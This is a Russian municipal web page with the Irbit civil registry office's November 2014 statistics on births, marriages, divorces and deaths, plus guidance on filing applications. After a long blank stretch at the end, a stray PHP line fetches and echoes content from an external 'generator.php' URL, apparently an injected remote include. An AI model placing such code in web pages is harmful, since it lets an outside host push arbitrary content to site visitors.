Регистрация нового пользоателя


Летний лагерь Салют 2010 год
Летний лагерь Салют 2010 год
О работе отдела записи актов гражданского состояния города Ирбита Свердловской области за ноябрь 2014 год

2014-12-08 14:58:59
О работе отдела записи актов гражданского состояния города Ирбита Свердловской области за ноябрь 2014 год

Информация                                                                                                                                   о работе отдела записи актов гражданского состояния города Ирбита Свердловской области за  ноябрь 2014 год

        В жизни каждого человека бывают события с рождения и на протяжении всей жизни, которые регистрируются в органах ЗАГС. Посещение отдела ЗАГС для человека – это всегда связано с получением важных  и правоустанавливающих документов. Самым первым и главным документом гражданина  является свидетельство о рождении. Специалистами отдела ЗАГС производится регистрация актов гражданского состояния в полном соответствии с действующим законодательством Российской Федерации.  Отделом ЗАГС города Ирбита Свердловской области проводится работа по  обеспечению своевременной, качественной и полной государственной регистрации актов гражданского состояния, повышение уровня правового обслуживания населения, пополнения  актовыми записями  электронного архива. На сегодняшний день электронный архив отдела ЗАГС содержит  103976  актовых записей, начиная с 1962 года ( архивный фонд отдела ЗАГС города Ирбита Свердловской области содержит актовые записи, начиная с 1919 года) .    

За истекший месяц (ноябрь) 2014года отделом ЗАГС  города Ирбита Свердловской области зарегистрировано  123  акта гражданского состояния  в том числе:

О РОЖДЕНИИ  – 38. Среди зарегистрированных новорожденных мальчиков – 13, девочек – 25. Первым ребенком в семье родилось 16 детей, вторым – 15, третьим – 4, четвертым и более – 2  ребёнка. В ноябре  из числа зарегистрированных новорожденных,  в браке рождено – 26 детей, что составляет 68,4 % к числу новорожденных, одновременно с установлением отцовства зарегистрировано актовых записей о рождении – 6 (в октябре – 1). По сравнению с прошлым, 2013 годом, за этот же период было зарегистрировано на 111 записей меньше (в 2013 на 30 ноября зарегистрировано 631 актовая запись о рождении, в 2014 - 520).

   При государственной регистрации рождения имя ребёнку дается по заявлению родителей, отчество – по имени отца и фамилия – по фамилии родителей (либо по заявлению матери). В  настоящее время родители дают новорождённым  разнообразные имена. Так, в октябре лидерами в мужских именах оказались МИХАИЛ и АРТЁМ, женских -  ДАРЬЯ и АРИНА,  в ноябре – МАТВЕЙ И ИЛЬЯ, ВЕРОНИКА, ВАЛЕРИЯ, ВИКТОРИЯ И АЛИНА); и 25 детей с различными именами, в том числе и редко встречающимися: ЕЛИСЕЙ, САВЕЛИЙ, ЕСЕНИЯ, ЛИДИЯ, АМЕЛИНА.

Возраст матери рожденного ребёнка также различен:

стали мамой в возрасте от 18 до 20  лет  - 4; с 21 года до 30 лет – 22;

от 31 до 40 лет – 12.

За  ноябрь 2014  года зарегистрировано   7  актовых  записей  об установлении отцовства  на основании совместного заявления родителей, 1 - по решению суда, одновременно с государственной регистрацией рождения - 6.

 

   За истекший месяц 2014 года зарегистрировано актовых записей о заключении брака 23, в торжественной обстановке зарегистрировано 15 пар. За 11 месяцев 2014 года зарегистрировано актов о заключении брака на 32 меньше по сравнению с таким же периодом 2013 года (в 2013 году – 346, в 2014 – 314).   В соответствии с п.1 статьи 11  Семейного кодекса Российской Федерации регистрация заключения брака по истечении месяца со дня подачи заявления в органы записи актов гражданского состояния. При наличии уважительных причин орган записи актов гражданского состояния по месту государственной регистрации заключения брака может разрешить заключение брака до истечения месяца, а также может увеличить этот срок, но не более чем на месяц.В том случае, когда есть уважительная причина для сокращения срока с момента подачи заявления до регистрации заключения брака, граждане пишут заявление о сокращении срока и таких в ноябре зарегистрировано 10 .

_____________________________________________

  

 Количество зарегистрированных расторжений брака за ноябрь составило 21 запись

 Зарегистрировано расторжений брака:                                                  

- на основании решения суда 18;                                                                                                   - на основании совместного  заявления супругов расторгли брак   3   семьи.                                             

Продолжительность пребывания в браке:  

- до 1 года браки не расторгались                                                                                                   - от 1 года до 5 лет – 10                                                                                                                     - от 6 до 10 лет – 4                                                                                                                                   - от 11 до 15 лет - 2                                                                                                                                 - свыше 15 лет - 5       

 

       Завершают статистическую информацию сведения об актовых записях   о смерти – всего за ноябрь зарегистрировано 35 записей.

     За  ноябрь 2014 года  год принято заявлений:                                                                                                -  о заключении брака – 28                                                                                                                        -  о расторжении брака – 26                                                                                                            -  об установлении отцовства – 8                                                                                                   -  о перемене  имени – 3                                                                                                                             -  о внесении исправлений, изменений – 11                                                                                     -  поступило заявлений граждан о выдаче документов – 155                                                         -  поступило запросов от учреждений, организаций – 218.

 

 

 

Начальник отдела ЗАГС                                                   Л.А.Шишкина

 

 

 

 

 

ИНФОРМАЦИЯ !!!

     Приёмные дни в отделе ЗАГС города Ирбита – это понедельник, вторник, четверг. В эти дни можно оформить документы, получить повторное свидетельство о регистрации акта гражданского состояния, справку, консультацию по вопросам государственной регистрации актов гражданского состояния. В среду и пятницу приём граждан не ведётся. Как поступить, если необходимо подать заявление либо получить документ? Есть много вариантов, а именно:

- через МФЦ (многофункциональный центр, расположенный по адресу г. Ирбит, ул. Советская, 31) можно:

1) подать заявление о государственной регистрации рождения от родителей в случае, если роды происходили в медицинской организации и заявления от родителей, состоящих  в зарегистрированном браке; 

2) подать заявление о государственной регистрации смерти. Запросы принимаются только от физических лиц;

3) подать запрос о выдаче повторного свидетельства о государственной регистрации акта гражданского состояния или иного документа, подтверждающего наличие либо отсутствие факта государственной регистрации акта гражданского состояния;

4) подать заявление на государственную регистрацию заключения брака;

5) подать заявление на государственную регистрацию расторжения брака по взаимному согласию супругов, не имеющих общих детей, не достигших совершеннолетия;

6) подать заявление на государственную регистрацию расторжения брака на основании решения суда, решение по которому вступило в законную силу после 1 мая 1996 года.

Часы работы МФЦ:

- понедельник, среда, пятница -  с 9.00 до 17.00 без перерыва

- вторник, четверг - с 10.00 до 18.00 без перерыва

- суббота, воскресенье - выходные дни

   Через портал государственных услуг

 - можно подать заявление на государственную регистрацию заключения брака. После подачи заявления через портал необходимо будет подойти в отдел ЗАГС в указанный в извещении период для  того, чтобы письменно оформить заявление. В том случае, если вы не являетесь в указанный срок, время будет передано другим гражданам.

- подать заявление о выдаче повторного свидетельства о государственной регистрации акта гражданского состояния или иного документа, подтверждающего наличие либо отсутствие факта государственной регистрации акта гражданского состояния.

   По электронной почте  (irbit@zags.gov66.ru)

- направить заявление о выдаче справки о наличие актовой записи, повторного свидетельства о государственной регистрации акта

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Как получить документы о регистрации актов гражданского состояния

с территории иностранных государств

     В последнее время многих жителей района интересует вопрос, как получить документы (повторные свидетельства, справки) о регистрации рождения, о заключении  или расторжении брака, установлении отцовства, перемены имени и смерти с территории иностранных государств?

         В соответствии Конвенцией о правовой помощи и правовых отношениях по гражданским, семейным и уголовным делам, подписанной государствами – членами Содружества Независимых Государств в Минске 22 января 1993 года (в редакции Протокола от 28 марта 1997 года), другими международными договорами, гражданам следует обратиться в орган ЗАГС по месту жительства либо пребывания для оформления запроса о правовой помощи, а также заявлений, которые заполняются гражданами собственноручно в 2-х экземплярах.

        Правом на обращение в орган ЗАГС по вопросу об истребовании документов (свидетельств, справок) о государственной регистрации актов гражданского состояния обладают лица, указанные в п.2 и 3 ст. 9 Федерального закона от 15.11.1997г. № 143-ФЗ «Об актах гражданского состояния», а именно:

         - лицо, в отношении которого была составлена запись акта гражданского состояния;

         - родственник умершего или другое заинтересованное лицо в случае, если человек, в отношении которого была составлена ранее запись акта гражданского состояния , умер;

         - родители (лица, их заменяющие) или представитель органа опеки и попечительства в случае, если лицо, в отношении которого была составлена запись акта о рождении, не достигло совершеннолетия ко дню выдачи повторного свидетельства;

          - иное лицо в случае представления нотариально удостоверенной доверенности от лица, имеющего право на получение повторного свидетельства о государственной регистрации акта гражданского состояния. 

         Вместе с тем повторное свидетельство о государственной регистрации акта гражданского состояния не выдаётся:

          - родителям (одному из родителей) ребёнка, в отношении которого они лишены родительских прав или ограничены в родительских правах (свидетельство о рождении ребёнка);

          - лицам, расторгнувшим брак, и лицам, брак которых признан недействительным (свидетельство о заключении брака). 

По просьбе указанных лиц им выдаётся документ (справка), подтверждающий факт государственной регистрации рождения ребёнка или заключении брака.

          Интересующие вопросы в части истребования документов с территории иностранных государств граждане могут задать по электронному адресу:  irbit@zags.gov66.ruили по телефонам отдела ЗАГС Ирбита         8 343 55 6-36-33 и  8 343 55 3-65-11.




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>